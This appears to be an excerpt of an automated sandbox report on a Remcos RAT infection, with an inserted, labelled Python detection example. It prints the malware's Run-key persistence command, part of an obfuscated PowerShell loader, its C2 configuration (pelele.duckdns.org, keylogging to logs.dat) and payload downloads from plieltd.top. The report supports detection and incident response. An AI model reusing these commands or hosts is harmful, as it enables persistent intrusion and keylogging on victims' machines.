Source: Process started | Author: Victor Sergeev, Daniil Yugoslavskiy, oscd.community | Data: Command: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Sandsynliggrelsens" /t REG_EXPAND_SZ /d "%Hexokinase% -windowstyle 1 $Jordbundssammenstnings=(gp -Path 'HKCU:\Software\Skulptureredes\').carlcorey;%Hexokinase% ($Jordbundssammenstnings)", CommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Sandsynliggrelsens" /t REG_EXPAND_SZ /d "%Hexokinase% -windowstyle 1 $Jordbundssammenstnings=(gp -Path 'HKCU:\Software\Skulptureredes\').carlcorey;%Hexokinase% ($Jordbundssammenstnings)", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Sandsynliggrelsens" /t REG_EXPAND_SZ /d "%Hexokinase% -windowstyle 1 $Jordbundssammenstnings=(gp -Path 'HKCU:\Software\Skulptureredes\').carlcorey;%Hexokinase% ($Jordbundssammenstnings)", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7432, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Sandsynliggrelsens" /t REG_EXPAND_SZ /d "%Hexokinase% -windowstyle 1 $Jordbundssammenstnings=(gp -Path 'HKCU:\Software\Skulptureredes\').carlcorey;%Hexokinase% ($Jordbundssammenstnings)", ProcessId: 7664, ProcessName: reg.exe
Source: Network Connection | Author: frack113 | Data: DestinationIp: 172.67.155.139, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 1012, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49744
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Sandsynliggrelsens" /t REG_EXPAND_SZ /d "%Hexokinase% -windowstyle 1 $Jordbundssammenstnings=(gp -Path 'HKCU:\Software\Skulptureredes\').carlcorey;%Hexokinase% ($Jordbundssammenstnings)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Sandsynliggrelsens" /t REG_EXPAND_SZ /d "%Hexokinase% -windowstyle 1 $Jordbundssammenstnings=(gp -Path 'HKCU:\Software\Skulptureredes\').carlcorey;%Hexokinase% ($Jordbundssammenstnings)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\SysWOW64\msiexec.exe", ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 1012, ParentProcessName: msiexec.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Sandsynliggrelsens" /t REG_EXPAND_SZ /d "%Hexokinase% -windowstyle 1 $Jordbundssammenstnings=(gp -Path 'HKCU:\Software\Skulptureredes\').carlcorey;%Hexokinase% ($Jordbundssammenstnings)", ProcessId: 7432, ProcessName: cmd.exe
Source: Process started | Author: Michael Haag | Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\IMGRO Facturi nepl#U0103tite 56773567583658567835244234Bandido.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\IMGRO Facturi nepl#U0103tite 56773567583658567835244234Bandido.vbs", CommandLine|base64offset|contains: -, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\IMGRO Facturi nepl#U0103tite 56773567583658567835244234Bandido.vbs", ProcessId: 7768, ProcessName: wscript.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Servicetilbuds Fangerne Sidsernes Cormidium Brnesangen Pouty #>;$Tredjeverdenslandets='Bilberries43';<#Efterordenes fjedervgt Soubrettens leftism Radiography #>;$Saltvandsfisk=$selvvirkendes+$host.UI; function pepperiness($Klassesttet){If ($Saltvandsfisk) {$Envisaging++;}$possesses=$Unlimned+$Klassesttet.'Length'-$Envisaging; for( $Multiciliated=4;$Multiciliated -lt $possesses;$Multiciliated+=5){$Aithochroi56=$Multiciliated;$Politiskoler+=$Klassesttet[$Multiciliated];$Opbyggeligste='Weltanschauung';}$Politiskoler;}function Isopor($jomfrunalske){ & ($Hovedkarakterer) ($jomfrunalske);} [...] (the remainder is the same obfuscated command line shown for PID 7876 in the process tree above; the event record is cut off in the original report)
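The Run-key value written by reg.exe (PID 7664) is the persistence worth hunting for rather than the dropped file: the launcher is an environment variable (%Hexokinase%, expanded at logon because the value type is REG_EXPAND_SZ; presumably set by the loader in the user's environment, which this report does not show), the second stage is read back from the registry value HKCU:\Software\Skulptureredes\carlcorey with Get-ItemProperty (gp) and handed straight to %Hexokinase% again, and -windowstyle 1 (ProcessWindowStyle.Hidden) keeps the window off screen. The Python below takes a Sysmon EventID 13 record in the field layout of the Sigma rows above and flags exactly those traits. It is an added example, not part of the report or of any detection product; both records are constructed, the first from the report's own event, the second a hypothetical benign OneDrive entry for contrast.

```python
"""Triage of Sysmon EventID 13 (registry value set) records for the
registry-resident Run-key persistence seen in this report. Added example,
not part of the Joe Sandbox report or of any detection product."""
import re

# Constructed from the report's 'Registry Key set' Sigma event (data fields only).
REMCOS_EVENT = (
    r"Details: %Hexokinase% -windowstyle 1 $Jordbundssammenstnings=(gp -Path "
    r"'HKCU:\Software\Skulptureredes\').carlcorey;%Hexokinase% ($Jordbundssammenstnings), "
    r"EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, "
    r"ProcessId: 7664, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows"
    r"\CurrentVersion\Run\Sandsynliggrelsens"
)
# Hypothetical benign entry for contrast (constructed, not from the report).
BENIGN_EVENT = (
    r"Details: C:\Program Files\Microsoft OneDrive\OneDrive.exe /background, "
    r"EventID: 13, EventType: SetValue, Image: C:\Windows\System32\reg.exe, "
    r"ProcessId: 4242, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows"
    r"\CurrentVersion\Run\OneDrive"
)

RUN_KEY = re.compile(r"\\CurrentVersion\\Run(Once)?\\", re.I)


def parse_event(record: str) -> dict:
    """Split 'Key: value, Key: value' fields. Only a ', ' that introduces a new
    'Key: ' starts a field, so commas and colons inside Details survive."""
    fields = {}
    for part in re.split(r", (?=[A-Za-z]+: )", record):
        key, _, value = part.partition(": ")
        fields[key] = value
    return fields


def triage_run_value(details: str) -> list:
    """Flag the traits of this sample's launcher string. Each check is a
    separate finding so one trait on its own does not decide the verdict."""
    findings = []
    # REG_EXPAND_SZ lets %Hexokinase% resolve at logon to whatever the loader
    # placed in the user's environment instead of a fixed executable path.
    if re.match(r"\s*%[^%]+%", details):
        findings.append("launcher-is-env-var")
    # Second stage is fetched from a registry value via gp / Get-ItemProperty.
    if re.search(r"\b(gp|Get-ItemProperty)\b[^;]*\bHK(CU|LM):", details, re.I):
        findings.append("stage-read-from-registry")
    # The fetched string is executed: %var% ($x), iex or Invoke-Expression.
    if re.search(r"%[^%]+%\s*\(\$\w+\)|\biex\b|Invoke-Expression", details, re.I):
        findings.append("registry-string-executed")
    # -windowstyle 1 is ProcessWindowStyle.Hidden.
    if re.search(r"-w(indowstyle)?\s+(1|hidden)\b", details, re.I):
        findings.append("hidden-window")
    return findings


def triage_event(record: str) -> dict:
    """Parse one record and triage it if the target is a Run/RunOnce value."""
    ev = parse_event(record)
    target = ev.get("TargetObject", "")
    in_run_key = bool(RUN_KEY.search(target))
    return {
        "value": target.rsplit("\\", 1)[-1],
        "image": ev.get("Image", ""),
        "run_key": in_run_key,
        "findings": triage_run_value(ev.get("Details", "")) if in_run_key else [],
    }


if __name__ == "__main__":
    for rec in (REMCOS_EVENT, BENIGN_EVENT):
        print(triage_event(rec))
```

Cleaning this up means removing both the Run value and the HKCU:\Software\Skulptureredes key that holds the stage; deleting only the launcher leaves the payload in place for the next lure to re-arm.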

                Stealing of Sensitive Information

Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Windows\SysWOW64\msiexec.exe, ProcessId: 1012, TargetFilename: C:\ProgramData\remcos\logs.dat
Suricata IDS alerts (Remcos C2 traffic to 185.236.203.101:51525, matching the port in the extracted configuration, pelele.duckdns.org:51525):
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-21T14:17:44.971905+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49745 | 185.236.203.101 | 51525 | TCP
2024-10-21T14:17:47.995395+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49746 | 185.236.203.101 | 51525 | TCP
2024-10-21T14:17:51.087230+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49747 | 185.236.203.101 | 51525 | TCP
2024-10-21T14:17:54.067087+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49748 | 185.236.203.101 | 51525 | TCP
2024-10-21T14:17:57.062288+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49750 | 185.236.203.101 | 51525 | TCP
2024-10-21T14:17:59.200136+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49751 | 185.236.203.101 | 51525 | TCP
2024-10-21T14:18:02.562679+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49758 | 185.236.203.101 | 51525 | TCP
2024-10-21T14:18:05.364964+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49769 | 185.236.203.101 | 51525 | TCP
2024-10-21T14:18:08.447528+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49788 | 185.236.203.101 | 51525 | TCP
2024-10-21T14:18:11.941565+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49806 | 185.236.203.101 | 51525 | TCP
2024-10-21T14:18:15.470639+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49823 | 185.236.203.101 | 51525 | TCP
2024-10-21T14:18:18.489328+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49843 | 185.236.203.101 | 51525 | TCP
2024-10-21T14:18:20.996537+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49863 | 185.236.203.101 | 51525 | TCP
2024-10-21T14:18:24.548551+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49874 | 185.236.203.101 | 51525 | TCP
2024-10-21T14:18:28.144206+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49895 | 185.236.203.101 | 51525 | TCP
2024-10-21T14:18:31.950214+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49914 | 185.236.203.101 | 51525 | TCP
2024-10-21T14:18:34.176307+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49933 | 185.236.203.101 | 51525 | TCP
2024-10-21T14:18:36.264503+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49945 | 185.236.203.101 | 51525 | TCP
2024-10-21T14:18:38.555739+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49958 | 185.236.203.101 | 51525 | TCP
2024-10-21T14:18:40.757396+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49971 | 185.236.203.101 | 51525 | TCP
2024-10-21T14:18:43.466320+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49984 | 185.236.203.101 | 51525 | TCP
2024-10-21T14:18:46.400379+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49999 | 185.236.203.101 | 51525 | TCP
2024-10-21T14:18:49.663580+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50011 | 185.236.203.101 | 51525 | TCP
2024-10-21T14:18:52.877339+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50022 | 185.236.203.101 | 51525 | TCP
2024-10-21T14:18:55.536726+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50034 | 185.236.203.101 | 51525 | TCP
2024-10-21T14:18:58.130787+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50036 | 185.236.203.101 | 51525 | TCP
2024-10-21T14:19:00.887989+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50037 | 185.236.203.101 | 51525 | TCP
2024-10-21T14:19:03.667580+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50038 | 185.236.203.101 | 51525 | TCP
                2024-10-21T14:19:06.491923+020020365941Malware Command and Control Activity Detected192.168.2.450039185.236.203.10151525TCP
                2024-10-21T14:19:09.993139+020020365941Malware Command and Control Activity Detected192.168.2.450040185.236.203.10151525TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-21T14:17:40.495655+020028032702Potentially Bad Traffic192.168.2.449744172.67.155.139443TCP

                AV Detection

                Source: 0000000A.00000002.2937740641.0000000007CD0000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: Remcos {"Host:Port:Password": ["pelele.duckdns.org:51525:1"], "Assigned name": "MISS Chy", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-TXCR8B", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
                Source: Yara match | File source: 0000000A.00000002.2937740641.0000000007D00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000A.00000002.2949377378.000000002377E000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000A.00000002.2937740641.0000000007CD0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: msiexec.exe PID: 1012, type: MEMORYSTR
                Source: Yara match | File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                Source: Submitted Sample | Integrated Neural Analysis Model: Matched 98.6% probability
                Source: unknown | HTTPS traffic detected: 172.67.155.139:443 -> 192.168.2.4:49737 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 172.67.155.139:443 -> 192.168.2.4:49744 version: TLS 1.2
                Source: Binary string: ystem.Core.pdbz source: powershell.exe, 00000005.00000002.1988660063.000000000769A000.00000004.00000020.00020000.00000000.sdmp

                Software Vulnerabilities

                Source: C:\Windows\System32\wscript.exe | Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

                Networking

                Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49745 -> 185.236.203.101:51525
                Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49747 -> 185.236.203.101:51525
                Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49748 -> 185.236.203.101:51525
                Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49746 -> 185.236.203.101:51525
                Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49769 -> 185.236.203.101:51525
                Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49863 -> 185.236.203.101:51525
                Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49751 -> 185.236.203.101:51525
                Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49843 -> 185.236.203.101:51525
                Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49806 -> 185.236.203.101:51525
                Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49758 -> 185.236.203.101:51525
                Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49895 -> 185.236.203.101:51525
                Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49788 -> 185.236.203.101:51525
                Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49823 -> 185.236.203.101:51525
                Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49750 -> 185.236.203.101:51525
                Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49874 -> 185.236.203.101:51525
                Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49945 -> 185.236.203.101:51525
                Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49914 -> 185.236.203.101:51525
                Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49971 -> 185.236.203.101:51525
                Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49984 -> 185.236.203.101:51525
                Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50011 -> 185.236.203.101:51525
                Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50039 -> 185.236.203.101:51525
                Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49958 -> 185.236.203.101:51525
                Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50037 -> 185.236.203.101:51525
                Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50036 -> 185.236.203.101:51525
                Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50034 -> 185.236.203.101:51525
                Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50022 -> 185.236.203.101:51525
                Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50040 -> 185.236.203.101:51525
                Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50038 -> 185.236.203.101:51525
                Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49933 -> 185.236.203.101:51525
                Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49999 -> 185.236.203.101:51525
                Source: Malware configuration extractor | URLs: pelele.duckdns.org
                Source: unknown | DNS query: name: pelele.duckdns.org
                Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\PING.EXE ping gormezl_6777.6777.6777.677e
                Source: global traffic | TCP traffic: 192.168.2.4:49745 -> 185.236.203.101:51525
                Source: Joe Sandbox View | IP Address: 185.236.203.101
                Source: Joe Sandbox View | ASN Name: M247GB
                Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49744 -> 172.67.155.139:443
                Source: global traffic | HTTP traffic detected: GET /Tlles187.deploy HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 | Host: plieltd.top | Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET /ZPepSmQfDUPElVSkiams84.bin HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 | Host: plieltd.top | Cache-Control: no-cache
                Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global traffic | HTTP traffic detected: GET /Tlles187.deploy HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 | Host: plieltd.top | Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET /ZPepSmQfDUPElVSkiams84.bin HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 | Host: plieltd.top | Cache-Control: no-cache
                Source: global traffic | DNS traffic detected: DNS query: gormezl_6777.6777.6777.677e
                Source: global traffic | DNS traffic detected: DNS query: plieltd.top
                Source: global traffic | DNS traffic detected: DNS query: pelele.duckdns.org
                Source: wscript.exe, 00000000.00000003.1641316528.00000221C114B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1641980389.00000221C114B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1641056271.00000221C114B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1640430096.00000221C113E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                Source: wscript.exe, 00000000.00000003.1641316528.00000221C114B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1641980389.00000221C114B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1641056271.00000221C114B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1640430096.00000221C113E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                Source: powershell.exe, 00000003.00000002.1774074401.000001CBABCF5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1982397865.0000000005DAE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
                Source: powershell.exe, 00000005.00000002.1970364131.0000000004E98000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
                Source: powershell.exe, 00000003.00000002.1753278151.000001CB9DA00000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://plieltd.top
                Source: powershell.exe, 00000003.00000002.1753278151.000001CB9BC81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1970364131.0000000004D41000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: powershell.exe, 00000005.00000002.1970364131.0000000004E98000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                Source: powershell.exe, 00000003.00000002.1753278151.000001CB9BC81000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
                Source: powershell.exe, 00000005.00000002.1970364131.0000000004D41000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6lBkq
                Source: powershell.exe, 00000005.00000002.1982397865.0000000005DAE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
                Source: powershell.exe, 00000005.00000002.1982397865.0000000005DAE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
                Source: powershell.exe, 00000005.00000002.1982397865.0000000005DAE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
                Source: powershell.exe, 00000005.00000002.1970364131.0000000004E98000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
                Source: powershell.exe, 00000003.00000002.1753278151.000001CB9C81E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro
                Source: powershell.exe, 00000003.00000002.1774074401.000001CBABCF5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1982397865.0000000005DAE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
                Source: powershell.exe, 00000003.00000002.1753278151.000001CB9D2C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1753278151.000001CB9BEA6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://plieltd.top
                Source: msiexec.exe, 0000000A.00000002.2937740641.0000000007CD0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://plieltd.top/
                Source: powershell.exe, 00000003.00000002.1753278151.000001CB9BEA6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://plieltd.top/Tlles187.deployP
                Source: powershell.exe, 00000005.00000002.1970364131.0000000004E98000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://plieltd.top/Tlles187.deployXR#l
                Source: msiexec.exe, 0000000A.00000002.2937740641.0000000007C93000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000002.2949204687.0000000023470000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://plieltd.top/ZPepSmQfDUPElVSkiams84.bin
                Source: msiexec.exe, 0000000A.00000002.2937740641.0000000007C93000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://plieltd.top/ZPepSmQfDUPElVSkiams84.bin8p
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49744
                Source: unknown | Network traffic detected: HTTP traffic on port 49744 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49737
                Source: unknown | Network traffic detected: HTTP traffic on port 49737 -> 443
                Source: unknown | HTTPS traffic detected: 172.67.155.139:443 -> 192.168.2.4:49737 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 172.67.155.139:443 -> 192.168.2.4:49744 version: TLS 1.2

                E-Banking Fraud

                Source: Yara match | File source: 0000000A.00000002.2937740641.0000000007D00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000A.00000002.2949377378.000000002377E000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000A.00000002.2937740641.0000000007CD0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: msiexec.exe PID: 1012, type: MEMORYSTR
                Source: Yara match | File source: C:\ProgramData\remcos\logs.dat, type: DROPPED

                System Summary

                Source: amsi32_8168.amsi.csv, type: OTHER | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 7876, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 8168, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
